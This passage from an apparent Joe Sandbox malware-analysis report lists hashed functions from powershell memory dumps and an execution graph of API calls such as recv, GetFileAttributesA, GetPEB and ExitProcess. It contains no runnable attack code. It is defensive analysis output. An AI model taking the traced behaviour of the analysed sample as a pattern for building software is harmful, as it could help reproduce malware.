                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78314F31604745DFEB21AE78D849BA677E9BF40350F208429E599E7292DF7DEC80CB90
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 00007FF848CC7808 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820981268.00007FF848CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CB0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ff848cb0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: cf060aee85cead54f7d0898474a1c853a3ff5ba6a9969df129f040243e384edf
                                                                                                                                                                                                                                        • Instruction ID: 556a19ee663a73757ba0f03b4df111e12885eee1467cbc17ae3b7dd2cc54fcf5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf060aee85cead54f7d0898474a1c853a3ff5ba6a9969df129f040243e384edf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20713B3071CD098FDB98EA2DD495A7A73D2EF99354B14416CE05EC76E2CE24FC42AB48
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00007FF848D855CD Relevance: .3, Instructions: 257COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2823333697.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ff848d80000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 399058d9cb95cac132d6add329c7568897033c03962f17ab5dcd5f16ac80094d
                                                                                                                                                                                                                                        • Instruction ID: b1f11e5b7e9fd7398c2b5df723874fee816feae6a166035ceb578ea69d89923c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 399058d9cb95cac132d6add329c7568897033c03962f17ab5dcd5f16ac80094d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2471E621D0FBC54FE766A738186A6A47FB0EF52650F1D01FBC099CB1E3EA18584E8356
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00007FF848D8BD34 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2823333697.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ff848d80000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6c3d6257d29c8b894d816da0e288859105b8c2b5a470a244e659e305db5ba1eb
                                                                                                                                                                                                                                        • Instruction ID: 5c22b2b0c1b4dcc4cb6d71912e6f7119dd5edc29f621a1a4fbfa23ef3e763516
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c3d6257d29c8b894d816da0e288859105b8c2b5a470a244e659e305db5ba1eb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5411A32F1DE595FE7A9AA1C78122B873C1EF85660F4802BBD55FC3182DF15AC0646C9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00007FF848CC77C0 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820981268.00007FF848CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CB0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ff848cb0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e643aab23ec5501894ab9af93392d920f599ac49e4e04b73f55089feb4f233e6
                                                                                                                                                                                                                                        • Instruction ID: 236a8761ff3dec52721da9752d4dd3c285656ec8bfcbc279e1a1e986eda65501
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e643aab23ec5501894ab9af93392d920f599ac49e4e04b73f55089feb4f233e6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4311562E1CD4A1FE3A8EA6C945A67573C1EF58791F4001BED48EC32D3DE08A8468289
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00007FF848D8572D Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2823333697.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ff848d80000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c854a27b1ac37ec01c40c16d801f36718bb65cacdf8e1ddc241b140ee2afeeb4
                                                                                                                                                                                                                                        • Instruction ID: e5c8bff8948f7c141cc8728bdfc12d43cdd71b1818ce9721c6a185f0fdc72a57
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c854a27b1ac37ec01c40c16d801f36718bb65cacdf8e1ddc241b140ee2afeeb4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5821712190FBC15FD36257385C696A57FB0EF13260F0942EBC0A6CB1E3DA18684AC766
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00007FF848D8BD68 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2823333697.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ff848d80000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a695dcf752f4c7f958b898c53f14751034ea141fd685c3a86080328fa207b41b
                                                                                                                                                                                                                                        • Instruction ID: 21c0ceff46724caa1bfd111826551c52603388a8ca2ac089344751fb32fd2f42
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a695dcf752f4c7f958b898c53f14751034ea141fd685c3a86080328fa207b41b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC11CC32F1DE155FE3A9A51C34122B873C2EF85671F4802BAD45FC3286DE156C06058D
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00007FF848CB33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820981268.00007FF848CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CB0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ff848cb0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                        • Instruction ID: 6037ff74da3c8272be87e1aa7ead4f420cb197e537937a16625ab783ce59eaa1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD01A73010CB0C4FD744EF0CE051AA6B3E0FB95360F10052DE58AC3651DB36E882CB45
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:5.8%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                        Total number of Nodes:546
                                                                                                                                                                                                                                        Total number of Limit Nodes:22
                                                                                                                                                                                                                                        execution_graph 12109 395f89 12112 395e27 12109->12112 12113 395e35 __cftof 12112->12113 12114 395e80 12113->12114 12117 395e8b 12113->12117 12116 395e8a 12123 399b02 GetPEB 12117->12123 12119 395e95 12120 395eaa __cftof 12119->12120 12121 395e9a GetPEB 12119->12121 12122 395ec2 ExitProcess 12120->12122 12121->12120 12124 399b1c __cftof 12123->12124 12124->12119 12125 367510 12126 367516 12125->12126 12132 396056 12126->12132 12129 367536 12131 367530 12139 395f9f 12132->12139 12134 367523 12134->12129 12135 3960e4 12134->12135 12136 3960f0 12135->12136 12138 3960fa __cftof __dosmaperr 12136->12138 12155 39606d 12136->12155 12138->12131 12140 395fab 12139->12140 12142 395fb2 __cftof __dosmaperr 12140->12142 12143 399b33 12140->12143 12142->12134 12144 399b3f 12143->12144 12147 399bd7 12144->12147 12146 399b5a 12146->12142 12150 399bfa 12147->12150 12149 399c40 __freea 12149->12146 12150->12149 12151 39cff0 12150->12151 12152 39cffd __cftof 12151->12152 12153 39d028 RtlAllocateHeap 12152->12153 12154 39d03b __dosmaperr 12152->12154 12153->12152 12153->12154 12154->12149 12156 39607a __cftof __dosmaperr __freea 12155->12156 12157 39608f 12155->12157 12156->12138 12157->12156 12159 399833 12157->12159 12160 399870 12159->12160 12161 39984b 12159->12161 12160->12156 12161->12160 12163 39fbf9 12161->12163 12164 39fc05 12163->12164 12166 39fc0d __cftof __dosmaperr 12164->12166 12167 39fceb 12164->12167 12166->12160 12168 39fd11 __cftof __dosmaperr 12167->12168 12169 39fd0d 12167->12169 12168->12166 12169->12168 12171 39f480 12169->12171 12172 39f4cd 12171->12172 12178 396237 12172->12178 12175 39f77c 12175->12168 12176 39bdeb 5 API calls __fassign 12177 39f4dc __cftof 12176->12177 12177->12175 12177->12176 12177->12177 12184 39cbea 12177->12184 12179 39624e 12178->12179 12180 396257 12178->12180 12179->12177 12180->12179 12188 39adbc 12180->12188 12185 39cbf5 12184->12185 12186 39adbc __cftof 5 API calls 12185->12186 12187 39cc05 12186->12187 12187->12177 12189 39adcf 12188->12189 12191 39628d 12188->12191 12189->12191 12196 39ed6c 12189->12196 12192 39ade9 12191->12192 12193 39ae11 12192->12193 12194 39adfc 12192->12194 12193->12179 12194->12193 12209 39de72 12194->12209 12198 39ed78 __cftof 12196->12198 12197 39edc7 12197->12191 12198->12197 12201 3983e9 12198->12201 12200 39edec 12202 3983ee __cftof 12201->12202 12203 39cdf5 __cftof GetPEB ExitProcess GetPEB RtlAllocateHeap 12202->12203 12204 3983f9 12202->12204 12203->12204 12205 395f4d __cftof GetPEB ExitProcess GetPEB 12204->12205 12208 39842c __cftof 12205->12208 12206 39d028 RtlAllocateHeap 12207 39d03b __dosmaperr 12206->12207 12206->12208 12207->12200 12208->12206 12208->12207 12210 39de7c 12209->12210 12213 39dd8a 12210->12213 12212 39de82 12212->12193 12217 39dd96 __cftof __freea 12213->12217 12214 39ddb7 12214->12212 12215 3983e9 __cftof 5 API calls 12216 39de29 12215->12216 12218 39de65 12216->12218 12219 39a780 __cftof 5 API calls 12216->12219 12217->12214 12217->12215 12218->12212 12220 39de56 12219->12220 12221 39dc71 __cftof 5 API calls 12220->12221 12221->12218 12222 367540 12223 367546 12222->12223 12224 367548 GetFileAttributesA 12222->12224 12223->12224 12225 367554 12224->12225 12567 365470 12568 3654a8 shared_ptr 12567->12568 12569 36558e shared_ptr 12568->12569 12576 3621a0 12568->12576 12571 365699 shared_ptr 12572 3621a0 5 API calls 12571->12572 12573 365822 shared_ptr 12571->12573 12574 365727 shared_ptr 12572->12574 12574->12573 12575 3621a0 5 API calls 12574->12575 12575->12574 12579 362160 12576->12579 12580 362176 12579->12580 12583 398064 12580->12583 12586 396e53 12583->12586 12585 362184 12585->12571 12587 396e93 12586->12587 12591 396e7b __cftof __dosmaperr 12586->12591 12588 396237 __cftof 5 API calls 12587->12588 12587->12591 12589 396eab 12588->12589 12592 39740e 12589->12592 12591->12585 12594 39741f 12592->12594 12593 39742e __cftof __dosmaperr 12593->12591 12594->12593 12599 3979b2 12594->12599 12604 39760c 12594->12604 12609 397632 12594->12609 12619 397780 12594->12619 12600 3979bb 12599->12600 12601 3979c2 12599->12601 12628 39739a 12600->12628 12601->12594 12603 3979c1 12603->12594 12605 397615 12604->12605 12606 39761c 12604->12606 12607 39739a 5 API calls 12605->12607 12606->12594 12608 39761b 12607->12608 12608->12594 12611 397653 __cftof __dosmaperr 12609->12611 12612 397639 12609->12612 12610 3977b3 12617 3977c1 12610->12617 12618 3977d5 12610->12618 12652 397a8b 12610->12652 12611->12594 12612->12610 12612->12611 12614 3977ec 12612->12614 12612->12617 12614->12618 12648 397bda 12614->12648 12617->12618 12656 397f34 12617->12656 12618->12594 12620 397799 12619->12620 12621 3977b3 12619->12621 12620->12621 12623 3977ec 12620->12623 12626 3977c1 12620->12626 12622 397a8b 5 API calls 12621->12622 12621->12626 12627 3977d5 12621->12627 12622->12626 12624 397bda 5 API calls 12623->12624 12623->12627 12624->12626 12625 397f34 5 API calls 12625->12627 12626->12625 12626->12627 12627->12594 12629 3973ac __dosmaperr 12628->12629 12632 398376 12629->12632 12631 3973cf __dosmaperr 12631->12603 12633 398391 12632->12633 12636 3980d4 12633->12636 12635 39839b 12635->12631 12637 3980e6 12636->12637 12638 396237 __cftof 5 API calls 12637->12638 12641 3980fb __cftof __dosmaperr 12637->12641 12640 39812b 12638->12640 12640->12641 12642 398322 12640->12642 12641->12635 12643 39835f 12642->12643 12646 39832f 12642->12646 12644 39cbea GetPEB ExitProcess RtlAllocateHeap GetPEB RtlAllocateHeap 12643->12644 12645 39833e __fassign 12644->12645 12645->12640 12646->12645 12647 39cc0e GetPEB ExitProcess RtlAllocateHeap GetPEB RtlAllocateHeap 12646->12647 12647->12645 12650 397bf5 12648->12650 12649 397c27 12649->12617 12650->12649 12660 39bf60 12650->12660 12653 397aa4 12652->12653 12667 39ca9a 12653->12667 12655 397b57 12655->12617 12655->12655 12657 397fa7 12656->12657 12659 397f51 12656->12659 12657->12618 12658 39bf60 __cftof 5 API calls 12658->12659 12659->12657 12659->12658 12663 39be05 12660->12663 12662 39bf78 12662->12649 12664 39be15 12663->12664 12665 396237 __cftof 5 API calls 12664->12665 12666 39be1a __cftof __dosmaperr 12664->12666 12665->12666 12666->12662 12668 39caaa __cftof __dosmaperr 12667->12668 12670 39cac0 12667->12670 12668->12655 12669 39cb57 12673 39cb80 12669->12673 12674 39cbb6 12669->12674 12670->12668 12670->12669 12671 39cb5c 12670->12671 12680 39c2b1 12671->12680 12676 39cb9e 12673->12676 12677 39cb85 12673->12677 12697 39c5ca 12674->12697 12693 39c7b4 12676->12693 12686 39c910 12677->12686 12681 39c2c3 12680->12681 12682 396237 __cftof 5 API calls 12681->12682 12683 39c2d7 12682->12683 12684 39c2df __alldvrm __cftof __dosmaperr _strrchr 12683->12684 12685 39c5ca 5 API calls 12683->12685 12684->12668 12685->12684 12688 39c93e 12686->12688 12687 39c9b0 12704 39c66c 12687->12704 12688->12687 12689 39c989 12688->12689 12692 39c977 12688->12692 12701 39c83f 12689->12701 12692->12668 12694 39c7e1 12693->12694 12695 39c820 12694->12695 12696 39c83f 5 API calls 12694->12696 12695->12668 12696->12695 12698 39c5e2 12697->12698 12699 39c66c 5 API calls 12698->12699 12700 39c647 12698->12700 12699->12700 12700->12668 12702 396237 __cftof 5 API calls 12701->12702 12703 39c855 12702->12703 12703->12692 12705 39c67d 12704->12705 12706 396237 __cftof 5 API calls 12705->12706 12707 39c68b __cftof __dosmaperr 12705->12707 12708 39c6ac 12706->12708 12707->12692 12732 36d3a0 12733 36d3e9 shared_ptr 12732->12733 12735 36daa9 shared_ptr 12733->12735 12748 36ce00 12733->12748 12736 36de62 shared_ptr 12737 36dc66 shared_ptr 12737->12736 12738 36ce00 6 API calls 12737->12738 12740 36df43 shared_ptr 12738->12740 12739 36e015 shared_ptr 12740->12739 12741 396056 RtlAllocateHeap 12740->12741 12742 36e1c1 12741->12742 12743 36ce00 6 API calls 12742->12743 12745 36eb1c __dosmaperr 12743->12745 12744 36ed60 shared_ptr 12745->12744 12746 398376 5 API calls 12745->12746 12747 36efb8 std::_Xinvalid_argument 12746->12747 12751 36ce36 shared_ptr 12748->12751 12749 36ce00 6 API calls 12753 36dc66 shared_ptr 12749->12753 12750 36d369 shared_ptr 12750->12737 12751->12749 12751->12750 12752 36de62 shared_ptr 12752->12737 12753->12752 12754 36ce00 6 API calls 12753->12754 12756 36df43 shared_ptr 12754->12756 12755 36e015 shared_ptr 12755->12737 12756->12755 12757 396056 RtlAllocateHeap 12756->12757 12758 36e1c1 12757->12758 12759 36ce00 6 API calls 12758->12759 12761 36eb1c __dosmaperr 12759->12761 12760 36ed60 shared_ptr 12760->12737 12761->12760 12762 398376 5 API calls 12761->12762 12763 36efb8 std::_Xinvalid_argument 12762->12763 12764 36c990 recv 12765 36c9f2 recv 12764->12765 12766 36ca27 recv 12765->12766 12767 36ca61 12766->12767 12768 36cb83 12767->12768 12769 37c00c GetSystemTimePreciseAsFileTime 12767->12769 12770 36cbbe 12769->12770 12771 37bbca 7 API calls 12770->12771 12772 36cc28 12771->12772 12226 378130 12227 37818a 12226->12227 12233 379510 12227->12233 12231 378239 std::_Throw_future_error 12232 3781cc 12246 379850 12233->12246 12235 379545 12250 362bc0 12235->12250 12237 379576 12259 3798d0 12237->12259 12239 3781b4 12239->12232 12240 3642d0 12239->12240 12241 37b83f InitOnceExecuteOnce 12240->12241 12242 3642ea 12241->12242 12243 3642f1 12242->12243 12244 3965e8 6 API calls 12242->12244 12243->12231 12245 364304 12244->12245 12247 37986c 12246->12247 12264 37bfeb 12247->12264 12249 379877 12249->12235 12251 362bfd 12250->12251 12282 37b83f 12251->12282 12253 362c31 12253->12237 12254 362c26 12254->12253 12256 362c68 12254->12256 12285 37b857 12254->12285 12292 362320 12256->12292 12263 37994f shared_ptr 12259->12263 12261 3799b8 12262 37999b 12262->12239 12263->12261 12403 379b70 12263->12403 12267 37bd35 12264->12267 12266 37bffb 12266->12249 12268 37bd4b 12267->12268 12269 37bd41 12267->12269 12268->12266 12270 37bd1e 12269->12270 12271 37bcfe 12269->12271 12280 37c66a 12270->12280 12271->12268 12276 37c635 12271->12276 12274 37bd30 12274->12266 12277 37c643 InitializeCriticalSectionEx 12276->12277 12278 37bd17 12276->12278 12277->12278 12278->12266 12281 37c67f RtlInitializeConditionVariable 12280->12281 12281->12274 12295 37c591 12282->12295 12286 37b863 std::_Throw_future_error 12285->12286 12287 37b8d3 12286->12287 12288 37b8ca 12286->12288 12305 3629c0 12287->12305 12299 37b7df 12288->12299 12291 37b8cf 12291->12256 12398 37af36 12292->12398 12294 362352 12296 37c59f InitOnceExecuteOnce 12295->12296 12298 37b852 12295->12298 12296->12298 12298->12254 12300 37c591 InitOnceExecuteOnce 12299->12300 12301 37b7f7 12300->12301 12302 37b7fe 12301->12302 12319 3965e8 12301->12319 12302->12291 12304 37b807 12304->12291 12306 37b83f InitOnceExecuteOnce 12305->12306 12310 3629d4 12306->12310 12307 3629df 12307->12291 12308 3983e9 __cftof 5 API calls 12309 396623 12308->12309 12311 396640 12309->12311 12312 396632 12309->12312 12310->12307 12310->12308 12314 3962ba 5 API calls 12311->12314 12313 396696 6 API calls 12312->12313 12315 39663c 12313->12315 12316 39665a 12314->12316 12315->12291 12317 396696 6 API calls 12316->12317 12318 39666e __freea 12316->12318 12317->12318 12318->12291 12320 3965f4 12319->12320 12321 3983e9 __cftof 5 API calls 12320->12321 12322 396623 12321->12322 12323 396640 12322->12323 12324 396632 12322->12324 12339 3962ba 12323->12339 12331 396696 12324->12331 12327 39663c 12327->12304 12328 39665a 12329 396696 6 API calls 12328->12329 12330 39666e __freea 12328->12330 12329->12330 12330->12304 12332 3966a4 __cftof __dosmaperr 12331->12332 12333 3966c1 12331->12333 12332->12327 12334 396735 12333->12334 12335 396727 12333->12335 12338 3966e7 __cftof __dosmaperr 12333->12338 12348 396774 12334->12348 12342 3967fe 12335->12342 12338->12327 12340 396237 __cftof 5 API calls 12339->12340 12341 3962cc 12340->12341 12341->12328 12343 396825 12342->12343 12345 396853 12343->12345 12347 396894 __dosmaperr 12343->12347 12356 396b74 12343->12356 12345->12347 12360 396ac6 12345->12360 12347->12338 12385 396d11 12348->12385 12350 396782 12351 396787 __dosmaperr 12350->12351 12352 396ac6 5 API calls 12350->12352 12351->12338 12353 3967a0 12352->12353 12354 396b74 RtlAllocateHeap 12353->12354 12355 3967bf 12354->12355 12355->12338 12357 396b8d 12356->12357 12359 396ba1 __dosmaperr 12357->12359 12370 39ae69 12357->12370 12359->12345 12362 396adc _wcsrchr 12360->12362 12361 396b53 12361->12347 12362->12361 12374 39b2e5 12362->12374 12364 396b20 12364->12361 12365 39b2e5 5 API calls 12364->12365 12366 396b31 12365->12366 12366->12361 12367 39b2e5 5 API calls 12366->12367 12368 396b42 12367->12368 12368->12361 12369 39b2e5 5 API calls 12368->12369 12369->12361 12371 39ae93 12370->12371 12372 39cff0 RtlAllocateHeap 12371->12372 12373 39aeaf __dosmaperr __freea 12371->12373 12372->12373 12373->12359 12375 39b2f3 12374->12375 12378 39b2f9 __cftof __dosmaperr 12375->12378 12379 39b32e 12375->12379 12377 39b329 12377->12364 12378->12364 12380 39b358 12379->12380 12382 39b33e __cftof __dosmaperr 12379->12382 12381 396237 __cftof 5 API calls 12380->12381 12380->12382 12384 39b382 12381->12384 12382->12377 12383 39b2a6 GetPEB ExitProcess RtlAllocateHeap GetPEB RtlAllocateHeap 12383->12384 12384->12382 12384->12383 12386 396d35 12385->12386 12388 396d3b 12386->12388 12389 396a33 12386->12389 12388->12350 12390 396a3f __dosmaperr 12389->12390 12395 39b17c 12390->12395 12392 396a65 12392->12388 12393 396a57 __dosmaperr 12393->12392 12394 39b17c RtlAllocateHeap 12393->12394 12394->12392 12396 39afdf RtlAllocateHeap 12395->12396 12397 39b195 12396->12397 12397->12393 12399 37af51 std::_Throw_future_error 12398->12399 12400 3983e9 __cftof 5 API calls 12399->12400 12402 37afb8 __cftof 12399->12402 12401 37afff 12400->12401 12402->12294 12404 379bf0 12403->12404 12410 376ab0 12404->12410 12406 379c2c shared_ptr 12407 379e1e shared_ptr 12406->12407 12418 363dc0 12406->12418 12407->12262 12409 379e06 12409->12262 12411 376af1 12410->12411 12424 363850 12411->12424 12413 376d26 12413->12406 12414 376b8d 12414->12413 12415 37bfeb __Mtx_init_in_situ 2 API calls 12414->12415 12416 376ce1 12415->12416 12429 362da0 12416->12429 12419 363e28 12418->12419 12423 363dfe 12418->12423 12420 363e38 12419->12420 12503 362ae0 12419->12503 12420->12409 12423->12409 12425 37bfeb __Mtx_init_in_situ 2 API calls 12424->12425 12426 363887 12425->12426 12427 37bfeb __Mtx_init_in_situ 2 API calls 12426->12427 12428 3638c6 12427->12428 12428->12414 12430 362de6 12429->12430 12431 362e5e GetCurrentThreadId 12429->12431 12467 37c00c 12430->12467 12432 362e74 12431->12432 12449 362ecf 12431->12449 12438 37c00c GetSystemTimePreciseAsFileTime 12432->12438 12432->12449 12435 362efe 12470 37bbca 12435->12470 12437 362f04 12440 37bbca 7 API calls 12437->12440 12442 362e99 12438->12442 12439 362dfd __Mtx_unlock 12439->12437 12441 362e4f 12439->12441 12440->12442 12441->12431 12441->12449 12443 37bbca 7 API calls 12442->12443 12444 362ea0 __Mtx_unlock 12442->12444 12443->12444 12445 37bbca 7 API calls 12444->12445 12446 362eb8 __Cnd_broadcast 12444->12446 12445->12446 12447 37bbca 7 API calls 12446->12447 12446->12449 12448 362f1c 12447->12448 12450 37c00c GetSystemTimePreciseAsFileTime 12448->12450 12449->12413 12459 362f60 shared_ptr __Mtx_unlock 12450->12459 12451 3630a5 12452 37bbca 7 API calls 12451->12452 12453 3630ab 12452->12453 12454 37bbca 7 API calls 12453->12454 12455 3630b1 12454->12455 12456 37bbca 7 API calls 12455->12456 12464 363073 __Mtx_unlock 12456->12464 12457 363087 12457->12413 12458 37bbca 7 API calls 12460 3630bd 12458->12460 12459->12451 12459->12453 12459->12457 12461 363012 GetCurrentThreadId 12459->12461 12461->12457 12462 36301b 12461->12462 12462->12457 12463 37c00c GetSystemTimePreciseAsFileTime 12462->12463 12465 36303f 12463->12465 12464->12457 12464->12458 12465->12451 12465->12455 12465->12464 12474 37b6ac 12465->12474 12477 37bdb2 12467->12477 12469 362df2 12469->12435 12469->12439 12471 37bbf2 12470->12471 12472 37bbd4 12470->12472 12471->12471 12472->12471 12494 37bbf7 12472->12494 12497 37b4d2 12474->12497 12476 37b6bc 12476->12465 12478 37be08 12477->12478 12480 37bdda 12477->12480 12478->12480 12483 37c8cb 12478->12483 12480->12469 12481 37be5d __Xtime_diff_to_millis2 12481->12480 12482 37c8cb _xtime_get GetSystemTimePreciseAsFileTime 12481->12482 12482->12481 12484 37c8da 12483->12484 12486 37c8e7 __aulldvrm 12483->12486 12484->12486 12487 37c8a4 12484->12487 12486->12481 12490 37c54a 12487->12490 12491 37c567 12490->12491 12492 37c55b GetSystemTimePreciseAsFileTime 12490->12492 12491->12486 12492->12491 12495 3629c0 7 API calls 12494->12495 12496 37bc0e std::_Throw_future_error 12495->12496 12496->12472 12498 37b4fc 12497->12498 12499 37c8cb _xtime_get GetSystemTimePreciseAsFileTime 12498->12499 12502 37b504 __Xtime_diff_to_millis2 12498->12502 12500 37b52f __Xtime_diff_to_millis2 12499->12500 12501 37c8cb _xtime_get GetSystemTimePreciseAsFileTime 12500->12501 12500->12502 12501->12502 12502->12476 12504 362aee 12503->12504 12510 37b1a7 12504->12510 12506 362b22 12507 362b29 12506->12507 12516 362b60 12506->12516 12507->12409 12509 362b38 std::_Throw_future_error 12511 37b1b4 12510->12511 12515 37b1d3 Concurrency::details::_Reschedule_chore 12510->12515 12519 37c4d7 12511->12519 12513 37b1c4 12513->12515 12521 37b17e 12513->12521 12515->12506 12527 37b15b 12516->12527 12518 362b92 shared_ptr 12518->12509 12520 37c4f2 CreateThreadpoolWork 12519->12520 12520->12513 12522 37b187 Concurrency::details::_Reschedule_chore 12521->12522 12525 37c72c 12522->12525 12524 37b1a1 12524->12515 12526 37c741 TpPostWork 12525->12526 12526->12524 12528 37b167 12527->12528 12530 37b177 12527->12530 12528->12530 12531 37c3d8 12528->12531 12530->12518 12532 37c3ed TpReleaseWork 12531->12532 12532->12530 12714 378d40 12715 378d55 12714->12715 12719 378d93 12714->12719 12720 37ca76 12715->12720 12717 378d5f 12717->12719 12724 37ca2c 12717->12724 12722 37ca86 12720->12722 12721 37ca8f 12721->12717 12722->12721 12728 37cafe 12722->12728 12726 37ca3c 12724->12726 12725 37cae4 12725->12719 12726->12725 12727 37cae0 RtlWakeAllConditionVariable 12726->12727 12727->12719 12729 37cb0c SleepConditionVariableCS 12728->12729 12731 37cb25 12728->12731 12729->12731 12731->12722 12709 396371 12710 396389 12709->12710 12711 39637f 12709->12711 12712 3962ba 5 API calls 12710->12712 12713 3963a3 __freea 12712->12713 12773 37b28e 12774 37b115 8 API calls 12773->12774 12775 37b2b6 12774->12775 12776 37b078 8 API calls 12775->12776 12777 37b2cf 12776->12777 12533 37b219 12540 37b115 12533->12540 12535 37b266 12552 37b078 12535->12552 12536 37b241 Concurrency::details::_Reschedule_chore 12536->12535 12548 37c50e 12536->12548 12539 37b27e 12541 37b121 Concurrency::details::_Reschedule_chore 12540->12541 12542 37c00c GetSystemTimePreciseAsFileTime 12541->12542 12543 37b152 12541->12543 12544 37b136 12542->12544 12543->12536 12562 3629f0 12544->12562 12546 37b13c __Mtx_unlock 12547 